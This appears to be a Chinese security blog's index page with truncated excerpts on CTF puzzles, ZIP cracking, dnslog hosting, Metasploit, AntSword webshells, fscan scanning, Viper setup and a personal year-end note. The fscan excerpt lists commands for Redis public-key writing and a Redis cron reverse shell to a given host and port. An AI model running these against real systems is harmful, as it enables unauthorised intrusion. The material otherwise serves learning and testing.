在打 VNCTF2022 的时候遇到这样一道题，图片直接放在文章肯能看不清，各位可以点开来仔细观看 放大来看 又是点阵图，这不就是妥妥的点阵提取嘛，打开画图，量出来点之间的距离，然后开造！ 结果，出来很意外，每个点之间的距离都是不一样的，都在 49~51 之间浮动，这就导致直接提取不能提取出有效的信息 好在，每一行每一列的点都在同一条直线上，只要求出最左上角的点，然后跑出每一行每一列的坐标，再拼接即可 拼接的话可以使用 OpenCV 库，但是 Python 的 PIL（Pillow）好像更胜一筹，于是学了一下写了个脚本 from PIL import Image,ImageDraw image = Image.open ("misc-img-pixel-1.pn…

MISC 题目中，ZIP 压缩包一般会有五种破解方式 暴力 字典 明文 冗余数据 伪加密 一般来说我们可以使用 ARCHPR 来帮助我们破解 ZIP 在得到一个压缩包的时候，我们应该先阅读属性内容，里面能给你一些解题提示 这个就提示我们要六位暴力 以下就是提示我们可能存在冗余数据 其次，我们还可能存在字典，当然啦，我们要有对应的字典才行 在打开压缩包的时候，我们可以留意一下内外压缩包的文件时候有 CRC 校验码相同的，如果有我们可以尝试明文破解口令。 但是我们也可以不破解口令，直接通过密钥解密文件 在处理冗余数据时，我们可以采用 binwalk 判断冗余数据，并且 binwalk -e 提取，有时候不行的话还是自己动手吧 以上四种都很好理解，伪加密我们要使用 Win…

Dnslog 相信渗透的都不陌生，但我只是在 Apache Log4j 后才意识到这东西是有多好用 但是有些时候，知名的 dnslog.cn 网站就会崩溃。 既然这样，干脆就自己搭一个，但是过程十分艰辛。 由于我设置了 @* 解析，我就不需要再对 ns1.xxx.cn/ns2.xxx.cn 进行解析 具体如下 然后我们就接着物色 dnslog 平台 一个非常古老的 BugScanTeam 的 DNSLOG 于是乎，调了好久，6 年前的代码，还要改 cdn，还要改 ssl（开发组历史遗留问题） 最后改完了，发现一直 301，查看 issue 才发现要修改 SECURE_SSL_REDIRECT = False 然而，无论怎么修改数据库，还是进不去他的管理界面！ 之后只好另谋出路，最后…

Metasploit 一款开源安全漏洞检测工具，其不断更新的 Payload 使其成为了最强大的渗透框架之一 对于 MSFCONSOLE（简称 MSF），就不多赘述安装部署了，对于日常渗透使用一般可以再 Viper 中使用。 常见参数解读： -p, –payload <payload> 指定需要使用的 payload (攻击荷载)。也可以使用自定义 payload, 几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源。模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为 payload 预先指定一个 NOP 滑动长度 -f, –format < form…

Github 仓库 蚁剑官方加载器 这是一款 Webshell 管理的基础软件，渗透的一切都是围绕 shell 进行的，内置的插件也能解决一些小问题 附一张成功 webshell 的截图 连接密码对应 webshell 的 POST 参数

Github 仓库 Fscan 是一款内网综合扫描工具，以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B 段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell) fscan -h 19…

前导 Viper 中文炫彩蛇，为图形化的渗透平台，用户可以使用浏览器登录完成诸如 (覆盖初始访问 / 持久化 / 权限提升 / 防御绕过 / 凭证访问 / 信息收集 / 横向移动等大类) 操作，并提供内网隧道，文件管理，命令行等常用渗透工具。 在进行内网渗透中，还有内网网络拓扑等可视化工具提高工作效率。 安装 快捷部署有 Docker 和 F8X 一键部署两种方式 下方为 f8x 一件部署，推荐在全新 linux 环境中使用 curl -o f8x https://f8x.io/ # wget -O f8x https://f8x.io/bash f8x -viper 我所使用的时 Docker 安装，并在 wsl (Docker on desktop) 和 linux (CentOS 7) 系统下都…

转眼间 2021 年就只剩下了最后一天了。 在同学的提醒下，发现上一年居然没有总结，不过也没关系了，高中生活已经给我留下了弥足珍贵的回忆了。 过去的一年里，我结束了我的高中生活，在陌生的城市新的校园，开启了新的一段旅程。 在深圳大学，结识了许多 “有趣的灵魂”，也体会到了人外有人天外有天的 “学霸与卷王”。 很意外，我居然能很快融入新的环境，可以与学长们一起学习新的知识，了解更多新的技术，也很感谢学长们的帮助。 虽然退役了很久了，但是竞赛人竞赛魂，我还是参加了一些学校的小比赛。纵使离经叛道，没有继续在 ACM 的路上走下去。可喜的是，在 CTF 我重拾往日竞赛的热血与激情，相信我在新的道路上可以走得更远。 其实，我感觉，大学的生活远比高中要累，至少在高中，有…